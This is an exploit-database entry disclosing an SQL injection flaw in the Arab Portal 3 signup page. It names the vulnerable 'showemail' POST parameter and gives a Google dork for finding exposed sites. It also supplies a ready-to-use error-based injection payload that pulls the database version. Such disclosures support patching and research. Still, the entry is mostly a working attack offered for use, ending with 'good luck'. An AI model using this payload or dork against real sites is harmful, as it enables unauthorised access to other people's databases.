Arab Portal 3 - SQL Injection Vulnerability

2015-07-13T00:00:00
ID 1337DAY-ID-23878
Type zdt
Reporter ali ahmady
Modified 2015-07-13T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ## In The Name Of ALLAH ##
# title : Arabportal 3 SQL injection vulnerability
# Exploit Title: Arabportal 3 registeration section SQL injection vulnerability
# Google Dork: inurl:members.php?action=signup
# Date: 2015/07/10 (july 10th)
# Exploit Author: ali ahmady -- Iranian Security Researcher (snip3r_ir[at]hotmail.com)
# Vendor Homepage: www.arabportal.net
# Software Link: www.arabportal.net
# Version: 3
# Tested on: linux
# greetings : VIRkid, b0x, phantom_x, Ch3rn0by1 
 
 
members.php?action=singup
 
POST parameter "showemail" is vulnerable to error based SQLi attack
 
................................................................................
 
1' AND (SELECT 1212 FROM(SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.tables GROUP BY x)a) AND 'ali-ahmady'='ali-ahmady
 
 
video : https://youtu.be/5nFblYE90Vk
 
good luck

#  0day.today [2018-04-11]  #